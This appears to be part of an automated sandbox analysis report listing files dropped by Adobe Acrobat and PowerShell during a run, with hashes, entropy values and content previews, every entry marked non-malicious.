                                                          Malicious:false
                                                          Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733496132000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dd0f17db57e5734e373d1cdbdf192ce4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696504100000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3167b843a2a5ade9e2e656a38eb13d42","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696504100000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"064db7ab127b8d12f389c27ca0b1e226","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696504095000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c7e4fd7bca43d109b99402cc03ec13b7","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696503445000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9fbd47849261fc802c1ecaef20121b30","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696503445000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 28, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 28
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):1.4575647280939001
                                                          Encrypted:false
                                                          SSDEEP:48:TFl2GL7msrhoGgpP5ZgrI2yLviuFuI7Pw:/VmsrhoGgt5ZgMp74
                                                          MD5:5F6B39C2F9A18F7C50054B3F7FA7BC98
                                                          SHA1:43ECAB0A27300FC2698F1EEBE988DDFAC7CFF6DB
                                                          SHA-256:B9DC79EBD631F61805420AF262134182188E2E3083A744D898AD9E39309FA755
                                                          SHA-512:AB90E3190B8174F6A0AC381610F10ABB08E163CA1A1E40E0DD51C116F23F54EB036B12ACCE919EA1BA72B9B8D92B7DC3E7EE505AF34407E608D6E1C9D159FDEE
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):1.963342184020745
                                                          Encrypted:false
                                                          SSDEEP:48:7MdhoGgpP5ZgrI2lLviuFuI7PehuqVl2GL7msu:74hoGgt5ZgVp72huaVmsu
                                                          MD5:0AD3A510447999ED80B06637783CEADB
                                                          SHA1:4027F331D5C443316FD6D841B96B800F0C614FBD
                                                          SHA-256:E8235E4DEAE7CDF4521F4C212B2C9F57104954B0DD28CB5C9A120C39F5ECEC6E
                                                          SHA-512:B65B0B001988BCC5411EE47FD348C41D9A27B585B52CAC74B8DA598E8CD64CA52682B7F3036F9E85677C55915540FE835B53C2274282909D66C0D7DEDC0F7527
                                                          Malicious:false
                                                          Preview:.... .c........3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66726
                                                          Entropy (8bit):5.392739213842091
                                                          Encrypted:false
                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgMpwsgJyPRHe5wJQOmr4hysvqZ6V2Yyu:6a6TZ44ADEUwsgUE5Gmr4hkG2K
                                                          MD5:C5F1F0EE761D71455DC45A99D47E2E57
                                                          SHA1:C3058C2BD8CD7356B03A33DBABC6A418CCC2287F
                                                          SHA-256:13FF1461137D5E4156CB9B1453575D36D5659D3C3628F6BC41085E78277BBB3B
                                                          SHA-512:20EF7904F9C5AB235D882DCE25E5AF32D5B3748C9DEA3D8431C025105C8C132AB868CFC6FA1F7749EBE856873A8D667DFC460AEB2C33CA6523E0904848E9235D
                                                          Malicious:false
                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.890472898059848
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):3.5085442896850614
                                                          Encrypted:false
                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qelYH:Qw946cPbiOxDlbYnuRKkqYH
                                                          MD5:EEF024E86E913934807A416DEF28DD0D
                                                          SHA1:D7832AD98D68C2E792A7993E9088D37A268748B4
                                                          SHA-256:AEFCED29E55026F9C91310CC7AA4458CEBD86AEFFFB4520E087BA5FEB716CDEC
                                                          SHA-512:5E9C4164BA739AEA2F13D9738A0AD9EF9E9CE7F29CB92CB1548EE5A7DE9B3EB10F965E18676B92A81909EFB5627475B63D6DF1BAE151808D844DA703E6537CAF
                                                          Malicious:false
                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.4.2.:.2.0. .=.=.=.....
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393)
                                                          Category:dropped
                                                          Size (bytes):16525
                                                          Entropy (8bit):5.346011504419146
                                                          Encrypted:false
                                                          SSDEEP:384:BqIxwGbWz/d64bJEaE3eErgEVCjzI8K7Wq2YUYNzgzxzOupDPdz4I9j8jI/BvfDJ:5bEd3NShrMdom
                                                          MD5:789D1F2F853618A17B73FBEF9532AB2F
                                                          SHA1:5322D042DC96B7E30E3914F7C21729559D534D3E
                                                          SHA-256:482DB450F9F106D18D3E1EAE7A160CC9E75201F9336327CDBCA465997BF56FB2
                                                          SHA-512:20E8E45817B30FE1B03ABE69E71C534EF8DA2015CE237E3F93FDF932D6CDE1FD126465530B61E56A32E9D65A3A6858A1B3B00806571A232876EACAD293871629
                                                          Malicious:false
                                                          Preview:SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:322+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15113
                                                          Entropy (8bit):5.346111448009419
                                                          Encrypted:false
                                                          SSDEEP:384:aMApAQMAiAHPuQ2DUGDDD6f68IJJmRYBtRy/Y6QGKAyVMZAysNcHvI3c1i1Mte03:4xme
                                                          MD5:5033DD1CC5FD54EC5D4EFE2B613259C1
                                                          SHA1:591518FACF838F5513811A45CD083811B6491A15
                                                          SHA-256:BE7359AC4E8E694CF4CED41F4EDE6E0FBA4A523C621874BC5B14471BC52CDADD
                                                          SHA-512:E91983E0F2AD99B4E0AF2173956D92BF214FF6C43BE28A9D531A48B9001704C852961AA565971C8F06EA73B12B49CAFA1B39CAD1309CF28EE31914C3DA7D3336
                                                          Malicious:false
                                                          Preview:SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:889-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d7aea69e-dcea-4f71-b0d1-57629cdab9e9.1733496131889 Timestamp=2024-12-06T09:42:11:896-0500 ThreadID=6052 Component=ngl-lib_NglAppLib Description="SetConf
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):35721
                                                          Entropy (8bit):5.4030671755105635
                                                          Encrypted:false
                                                          SSDEEP:192:Ncb/mILxcb2cbeLIFrcbCkcbAIp/cbVcbIIJDcbZcbCIY+cbhcbsSWtCR+ILlcb9:2PLH8FVfpBJnY0L+
                                                          MD5:F478F01F28645DC03C7B21CAB9EAF4A8
                                                          SHA1:2D8FDC8F060A1740C563F77D5D01A7BCA134A7E6
                                                          SHA-256:FB4497A001F8C2D7140F95BDAF2D1C5CA9CBB3C7DEF873E3F0B6D59EED15B4CA
                                                          SHA-512:0A675C0FFCEF6F04ABFBF148CF6599B19EF77247880AE74CC3FFEB48C26A24F435881A10D4477AE4F78FF80691A075E0D3C823C1DE61E36CC94DC1E1163961DD
                                                          Malicious:false
                                                          Preview:05-10-2023 12:57:02:.---2---..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 12:57:02:.Closing File..05-10-
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                          Category:dropped
                                                          Size (bytes):758601
                                                          Entropy (8bit):7.98639316555857
                                                          Encrypted:false
                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                          MD5:3A49135134665364308390AC398006F1
                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                          Malicious:false
                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                          Category:dropped
                                                          Size (bytes):1407294
                                                          Entropy (8bit):7.97605879016224
                                                          Encrypted:false
                                                          SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                          MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                          SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                          SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                          SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                          Malicious:false
                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                          Category:dropped
                                                          Size (bytes):386528
                                                          Entropy (8bit):7.9736851559892425
                                                          Encrypted:false
                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                          Malicious:false
                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                          Category:dropped
                                                          Size (bytes):1419751
                                                          Entropy (8bit):7.976496077007677
                                                          Encrypted:false
                                                          SSDEEP:24576:/ln9WL07oXGZnYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:Nn9WLxXGZnZGh3mlind9i4ufFXpAXkru
                                                          MD5:C25E2B4EFCEA3238A9DF836F5CE5788B
                                                          SHA1:EBF937B898C971E6B7589F886D7DE74A89549C33
                                                          SHA-256:36781B670387BEBD830312F6C5185EF4A394FDFA20CBE51F9CD7087FA6D9559E
                                                          SHA-512:982C66139E2195AEF5B3A33AD22F45949A72416F3291A217D133DEEF96A358B302AA5013D09EF5565736A27E7DF95E98B0BB13054B609A49D38EAB23843B5A82
                                                          Malicious:false
